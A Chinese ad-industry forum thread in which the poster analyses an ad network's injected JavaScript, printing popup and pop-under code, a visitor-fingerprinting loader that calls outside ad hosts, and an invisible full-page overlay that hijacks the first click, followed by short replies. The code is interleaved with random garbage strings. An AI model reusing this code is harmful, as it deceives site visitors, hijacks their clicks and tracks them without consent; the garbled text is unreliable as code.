  380.                 } catch(e) {} ) Z( R) ^" ?+ t* [' I
  381.             }
    3 \# T8 h5 ], E5 P* `
  382.         },
      \* g  J/ h) Q
  383.         120);
    3 w9 a6 M) ?4 I
  384.         a.onclick = function(e) {
    2 V  v& b% I+ V5 G
  385.             if (document.getElementById('__unionsky_push_d_object_box__') != null) { ; d& Z% j+ R2 }( a
  386.                 form_div.parentNode.removeChild(form_div) 7 s' N- h" O+ S9 o/ c+ q4 e# p
  387.             } 7 b% C9 U  Q3 s+ ^
  388.             e = e || window.event; * V1 b7 h/ I' }- J5 U
  389.             e.cancelBubble = true;
    2 t! ?% B5 d# I
  390.             setTimeout(function() { 4 J0 L! N3 j; i
  391.                 a.parentNode.removeChild(a)
    - t! `3 K. S8 \* f! m
  392.             }, 8 @# W' J4 w4 C& H
  393.             200); 4 k( c+ |8 d7 Z, e5 m- W1 l
  394.             clearInterval(m);   X1 f1 P5 v. w5 T6 v3 p! @
  395.             ads++;
    ( P# F0 A1 o: L( c% Z, p, I
  396.             p(ckn, ckt, ads) ! Y) i2 Y) r. i! k* x
  397.         };
    : R) Y/ \' g! z3 j7 |$ H
  398.         event(a, 'mouseup', - }8 g4 g, ?; ?# y& l, ~& B* S- F
  399.         function(e) { ) t8 I% C7 b' _, Z4 j* ^( C. s1 `
  400.             e = e || window.event;
    ; r7 A/ P- t$ w  b1 u* }
  401.             e.cancelBubble = true! J: X4 v) ]8 W1 j3 u
  402.         }) 9 p) u' ]: l; }  z- ]' J
  403.     }
    . A9 u2 _3 r) e" W  W
  404.     function func(url, param) { , z+ Z/ Q7 Y: {) l0 m8 g
  405.         var f = window[String.fromCharCode(111, 112, 101, 110)];
    ( T. d- ?1 r' n7 {
  406.         var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); ) n& I/ H; z8 F/ z' T8 V. ?. i
  407.         if (w) {
    " p- b+ t  c& b* |# s8 r$ F; \  o
  408.             ads++; 2 o* q* ?& x& h* w* N4 |
  409.             p(ckn, ckt, ads) " J) A3 u/ i2 \
  410.         };
      h* z, {$ Q7 J4 O$ g5 G' l" K7 J$ h
  411.         return w
    9 p; N: H3 k& @, c- \# H! ~
  412.     } 6 Z3 u% B' [% a; A( o; R- M
  413.     function fstart(url) {
    1 d0 j# U/ B' V
  414.         init();
    % c  \( w5 v/ F" O
  415.         if (_ct >= 0) {
    3 D/ X& i1 H1 R- V8 n* Z& O
  416.             ckn = "YITIAN_NUM";
    . C3 ~9 j: D8 E. C1 ~. s
  417.             ckt = _ct
    ' u( ~2 L9 \) ~5 L9 l
  418.         } else { 8 d! b" h! Q5 Q0 H
  419.             ckn = "YITIAN_ALL";
    , f6 N* D3 k( Z- ?7 h' Y
  420.             ckt = Math.abs(_ct)
    / V% t( K! ]$ {$ _; ~( t
  421.         } 0 E5 b$ ?' U0 ~2 U- f( T
  422.         if (ckt > 0) {
    0 _5 F& b/ x& j* I2 D; {
  423.             if (b(ckn)) {
    / p6 b! N  M, _6 h
  424.                 try { ' A- r0 O' y2 @! Q! D( P1 m
  425.                     ads = parseFloat(b(ckn))
    0 U  \- D& R& _* `& D
  426.                 } catch(q) {} / }( e+ n4 O. G! F8 f
  427.             }
    2 a+ y) ~  a- m/ h7 H
  428.         }
    2 }) z& D) o1 z0 ~6 C' H9 E/ u
  429.         if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
    6 H" F# |9 V0 F+ h9 i7 B0 W
  430.             return, c0 {, Q* X) x- n& W
  431.         } else {   c4 s7 f4 K2 @* l8 y
  432.             if (_le > 0) { 5 X; I5 k0 O  A0 A% Q0 b' r/ u
  433.                 setTimeout(go(url), _le * 1000) ) e$ v$ b$ R7 T% |% n" ~+ K2 c
  434.             } else { % F* I9 L( M/ n0 q6 u8 e, \$ x) U" u
  435.                 go(url) ' |) {9 P5 m1 a; ^' A5 G# z
  436.             }
    $ M$ V% R2 h5 x  V
  437.         }   x- d% J% w& H) B# X8 y6 V
  438.     }
    $ j1 Y2 L+ [" W+ L4 ^
  439.     function go(url) { 9 O- j, T$ j  A6 {8 j7 I3 X4 @
  440.         if (_poo == 1) {
    6 [! P5 d( L0 G) [* {+ |- n& y
  441.             try {
    + e+ O, E* u2 a) p
  442.                 func(url)   m. f; f5 N' a* s; r1 [; r8 _
  443.             } catch(q) {} 1 Z# b  ]/ ~6 _, L& L  t
  444.         } else if (_pco == 1) { $ E" S) R7 _: P) ~& J4 F
  445.             a_pop(url)
    2 ]8 ]) |+ s* ]# b% w7 H, j
  446.         } else { 9 U5 c, x, s$ s7 [. j: `5 G1 D/ H6 \
  447.             if (_pd == 1) { . F/ \2 n0 ^% X& j2 O' l* S6 p' t
  448.                 setTimeout(function() { 3 q' L" N7 d+ h; f
  449.                     pop(url, { % |( l# R7 }6 c4 ~8 q* X
  450.                         a: 1, . I$ W0 }& j5 H" o
  451.                         b: 2
    # }: o  H+ b, S0 S8 B3 x( P
  452.                     })
    2 L" T* u7 @$ ]- ^3 z: I
  453.                 }, 4 t, V; v  r; o! I! k2 D9 H, o
  454.                 300)
    ! R$ V) L: Z+ R" ^& V
  455.             } 6 L  ~+ K2 ~( L5 X5 p
  456.             if (_pd2 > Math.random()) {
    3 m6 T  Z( ?/ I4 E% l
  457.                 setTimeout(function() {
    / S" Y1 o" M- O! G1 e" Z  z" B1 g
  458.                     pop(url, {
    7 J( X% |# t0 G8 b( ]2 a# a: u) M8 _
  459.                         a: 1, / ^8 e5 }5 K$ ~9 a# N
  460.                         b: 2 4 Y% T9 d# O! `" k: a. b4 d
  461.                     }) 3 O0 b" e+ N$ _* y$ O0 T
  462.                 },
    / A+ t1 }* `- o+ s+ ]; a, d$ L: q
  463.                 300)
    " C; A0 x& r! e. [3 \/ z
  464.             } 7 [8 K* \0 k4 m" m
  465.             for (var i = 1; i <= 10; i++) { / ?; I5 }) h4 q7 \6 x
  466.                 var n = i == 1 ? "": i;
    : V, M' K0 L5 k$ _0 e
  467.                 if (eval("_pt" + n + "b") > Math.random()) {
    : Y  Y* }# n9 ^; n% t, R2 a
  468.                     setTimeout(function() { , U" @2 z/ @. {2 a8 v  p. [
  469.                         setTimeout(function() { + ^4 D  {! F7 F9 V* P
  470.                             pop(url, {
    # {0 M' n+ z/ k6 ?1 n
  471.                                 a: 1,
    # d9 W/ c+ j( h' V; |" @7 _
  472.                                 b: 2
    % C+ d' O1 U4 n* v3 \
  473.                             })
    & ]- ]# v+ y' j: {6 x" ?8 M1 p. b
  474.                         },
    ' N5 D+ W! k' l: G7 T
  475.                         300)
    ; z6 ]+ @) X( F5 ^3 Q5 ]3 z
  476.                     },
    % q. E  y7 R1 f
  477.                     parseInt(eval("_pt" + n + "a")) * 1000)
    + b6 s9 d  w0 u% j% }, X/ @" X
  478.                 } 1 c, W" r+ A. T- r. L8 D
  479.             }
    . i4 K0 D2 G  _8 b# b
  480.             if (_pc2 > Math.random()) { . m6 b4 t0 h% ~1 D- \& ~
  481.                 a_pop(url)
    + H- [; P. F9 s5 B8 E
  482.             }
    ( G* q( m' f8 n' f8 V8 U( r
  483.             if (_po > Math.random()) { ; S8 R" [- Z% J1 t: U. O: M
  484.                 try {
    * \! ^6 I: R+ ?, [( U
  485.                     func(url)
    4 U3 e  o) S; A5 e0 ~
  486.                 } catch(q) {} % O2 F2 l4 g1 \# }& A; E( [; w
  487.             }   x  e' l: |% b% a' e$ `0 p
  488.         }
    : l; K* g4 J; z4 F4 j6 E' M+ O' q% u
  489.     }; 4 d& C3 ~, M* f7 j2 a
  490.     fstart(aa_url);
    6 Q2 V1 v* X% i5 f# |
  491.     event(window, 'beforeunload',
    5 G5 {; {0 C4 e/ ~3 O
  492.     function() {})
    + L5 t* ]: M) M
  493. })();
复制代码
通过浏览器抓包4 A0 C+ [1 M% m4 Y" r2 U4 e. e
URL从这里产生3 G' I. G5 ^5 a. P) I. s& X

4 x4 T4 j6 r# C$ zhttp://play.unionsky.cn/show/?placeid=1418303 }$ H/ ~7 B" ?# ~5 K; K

# V0 \: L2 H# j3 C. N% R$ G
: {, U0 z% A; }4 C4 `1 O
相关帖子
回复

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-17 15:04:10 | 显示全部楼层
直接打开看不到什么东西0 o: q/ X0 n9 U
http://www.unionsky.cn/ 是属于这个广告联盟的/ r$ H' t! F. H5 a. J+ L
我们直接分析抓包的内容" P5 X) r' J6 ]+ o
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
1 j: V5 S& S, H1 ?. b( Yytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r;
+ F$ `9 O: J, r  R" n, y  y1 s$ r& }var ytpp_u = encodeURIComponent(navigator.userAgent); 0 d; i' `. y# [3 B) l
var ytpp_s = window.screen.width + "*" + window.screen.height; * }; v2 U1 U$ F
var ytpp_l = navigator.browserLanguage || navigator.language; 6 u7 r0 P2 ]4 J: r1 a) G
var ytpp_plid = 141830; : T8 f- Y4 }6 S& }) _( o
var ytpp_w = 0; - _  K+ F" j; w7 z! p$ _
var ytpp_h = 0; : x# a8 [8 S1 f% w
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random();
  D! ]) `. Q; H  j& ]& Pvar ytpp_ads = 14; - \$ N. b, @/ U4 ~& l5 n
var ytpp_sti = 'CT:-3D:1C:1C2:1T:60,1T2:100,1;';
0 ]0 r0 |. Z# I% S% Z# @7 Tdocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>");
" m' B* `% b' f( sdocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");
& l+ _- n' h( X4 K
那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。
* Y  f. y0 l2 H; Q- Y7 I继续分析 发现这里
$ b' Q9 l: J# m+ S0 ^1 r8 J
. q6 V2 P0 G0 m! c! j3 ]http://txsite.21tx.com/count/count.js& b+ x4 i5 L% p4 x; @% U

0 q5 ?7 M# ]& N2 n! I/ E
txcount_uid = 1; ) t7 p4 Q+ {; a' M" y, \1 Q
txcount_uh = 0; + N; e' b3 U& @3 w* L; h
txcount_uw = 0; $ J" d! Y* E! N8 @9 w* x7 N( v
txcount_uah = 0; 4 Q; u2 i4 y  B3 V
txcount_uaw = 0; 3 |/ f) y8 S8 Y1 _
txcount_ucd = 0;
& G% I" V3 V. ~: r9 h$ t3 o   ) C" n# p/ ^. U7 e+ a5 ^/ R: N( h
if (window.screen) { 3 K( R7 T3 `% N2 |' _( \, V
  txcount_uh = window.screen.height; $ z3 g. ?9 ]9 E! f. }- f
  txcount_uw = window.screen.width;   Q& `4 m$ _+ a6 V  X
  txcount_uah = window.screen.availHeight; 9 E1 \* p0 G- `& u  x  n7 l
  txcount_uaw = window.screen.availWidth; : m/ @" G$ p% J/ k& o
  txcount_ucd = window.screen.colorDepth;
( x4 R2 `- i6 k# `$ F( _. W0 t- }}
5 C7 o3 G6 U: s' v9 h   1 E% z9 N4 N  c* R6 f
   , K& N% s" D3 H! K
var url = "http://txsite.21tx.com/count/count.aspx";
9 M8 e/ b* o4 s3 F( p' S$ Iurl = url + "?u="+ txcount_uid;
: \' c; l8 r. ]' i//url = url + "&f=" + txcount_f;
; R1 V% ]+ t# W" |  H. v/ B$ G) k2 lurl = url + "&k=" + txsite_pagekey; + A  H. v2 `9 I/ `4 H
//url = url + "&t=" + txcount_t; & Y; X/ }  v* j; x
url = url + "&l=" + escape(document.location); 1 V1 }/ a2 ^- U. a
url = url + "&r=" + escape(document.referrer);
/ h: |  N2 |% E7 Y( O# b- vurl = url + "&uh=" + txcount_uh;
+ T7 n9 X' N3 W) u- Durl = url + "&uw=" + txcount_uw;
6 k2 H. m. Q7 Q- r/ M& P" m5 h+ q% S. Uurl = url + "&uah=" + txcount_uah; $ J1 i% Q7 W2 c+ M+ X
url = url + "&uaw=" + txcount_uaw; 1 E- d% I( K; z8 x; _/ c' X
url = url + "&ucd=" + txcount_ucd;   k$ E2 ^  s7 [8 ~9 u6 c1 J
   
3 J; @& V" g- P* |! I2 D/ V1 t% H   
) a( {$ i6 K+ x3 ~0 Ndocument.write("<script src=" + url + "><\/script>");
. F) ^& ^, J  g# ^) @( z1 _//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>');
3 v. J1 a) O7 C8 d2 e   
% I# e4 Q1 R9 P2 {1 Y2 h3 {( [document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>'); . c5 e- [( o. ~  I
   
$ k2 W; w/ x" d. C" L8 `$ u   9 q, N' n+ H2 d$ ^' y# B7 I
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
' N. x4 v. g# B8 A( R
0 _0 U, w! o' g* O3 J  f# I
一切昭然天下了。5 o4 l8 H- l6 e  B1 I/ p
代码产生的直接效果如下
% x5 t% d; w. a4 L5 m( c5 k& [1 T! h0 A1 g6 z6 f4 s" p; h) Q
<a  target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a> ) l( N( |. M0 o6 y4 }) b

/ ^' ]# J, d4 L& k- ?  F# P很隐秘的一段好代码
4 \% i( q( j  i. @
回复 支持 反对

使用道具 举报

0

主题

480

广告币

1272

积分

高级会员

Rank: 4

积分
1272
发表于 2013-12-17 15:31:30 | 显示全部楼层
标记一下 好象看不懂还
回复 支持 反对

使用道具 举报

31

主题

257

广告币

792

积分

中级会员

Rank: 3Rank: 3

积分
792
发表于 2013-12-17 16:34:22 | 显示全部楼层
不清楚国内,莫非做taobao不可以直接用弹窗吗?
回复 支持 反对

使用道具 举报

4

主题

1288

广告币

1349

积分

高级会员

Rank: 4

积分
1349
发表于 2013-12-17 18:49:06 | 显示全部楼层
没用 360 搜狗 直接就拦截了,chrome可以弹出来
回复 支持 反对

使用道具 举报

54

主题

9

广告币

6010

积分

禁止访问

积分
6010
发表于 2013-12-17 19:34:38 | 显示全部楼层
adblock 完美屏蔽
回复 支持 反对

使用道具 举报

0

主题

91

广告币

97

积分

初级会员

Rank: 2

积分
97

社区QQ达人

发表于 2013-12-17 23:34:52 | 显示全部楼层
没研究全,期待跟多解析。
过往.
回复 支持 反对

使用道具 举报

6

主题

681

广告币

1089

积分

中级会员

Rank: 3Rank: 3

积分
1089

社区QQ达人

发表于 2013-12-18 00:52:13 | 显示全部楼层
代码看不懂,不过觉得挺好用的……自动弹窗
回复 支持 反对

使用道具 举报

51

主题

449

广告币

835

积分

中级会员

Rank: 3Rank: 3

积分
835
发表于 2013-12-18 01:24:03 | 显示全部楼层
没懂' P" q) P- d  E  q( Y
8 @4 I8 A5 ]5 x3 J1 O) h# Y4 {( t
1,首次访问有个弹窗,但是被chrome给拦截了
7 r- {1 Z7 e' e$ f" J; B/ j& a, h% G& W4 g# c- M" J& X2 ]
2,劫持了第一次点击
2 Z8 G- \5 N8 X  N! W2 u. _# V7 C0 S4 o/ l4 O8 V
3,CS了一下unionsky
% |5 B5 N2 ~( U  Z3 g+ n% O: m
2 x% b( C! R/ _$ I- y4 {) n然后?
回复 支持 反对

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-18 03:49:31 | 显示全部楼层
cissss 发表于 2013-12-18 01:24
: u7 ]7 N. y: q; A没懂$ k( `7 N0 |. {8 h2 |, H& D& H

( |1 {1 \7 ]$ g1,首次访问有个弹窗,但是被chrome给拦截了
2 K8 C  f+ Z$ r9 a$ k: b% S
懂的人一看就懂 不懂的人怎么看就不懂
回复 支持 反对

使用道具 举报

4

主题

428

广告币

706

积分

中级会员

Rank: 3Rank: 3

积分
706
发表于 2013-12-18 06:34:13 | 显示全部楼层
这个CJ怎么搞的这么复杂...
回复 支持 反对

使用道具 举报

51

主题

449

广告币

835

积分

中级会员

Rank: 3Rank: 3

积分
835
发表于 2013-12-18 17:31:57 | 显示全部楼层
小狠 发表于 2013-12-18 03:49
% k* `: b& }; L7 `9 k懂的人一看就懂 不懂的人怎么看就不懂
& }! L9 {! Y9 M  w- F' I% D- a! K
我确实不懂你发这贴的意思。 可以理解为装逼么?
回复 支持 反对

使用道具 举报

0

主题

386

广告币

341

积分

初级会员

Rank: 2

积分
341

社区QQ达人

发表于 2014-3-14 13:10:39 | 显示全部楼层
不就是个弹窗代码吗?
回复 支持 反对

使用道具 举报

3

主题

88

广告币

113

积分

初级会员

Rank: 2

积分
113

社区QQ达人

发表于 2014-3-14 23:11:34 | 显示全部楼层
我表示看不懂
回复 支持 反对

使用道具 举报

4

主题

1

广告币

135

积分

初级会员

Rank: 2

积分
135

社区QQ达人

QQ
发表于 2014-3-15 12:03:35 | 显示全部楼层
占位,慢慢领会啥意思
http://faaad.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2024-11-15 09:09 , Processed in 0.127051 second(s), 13 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表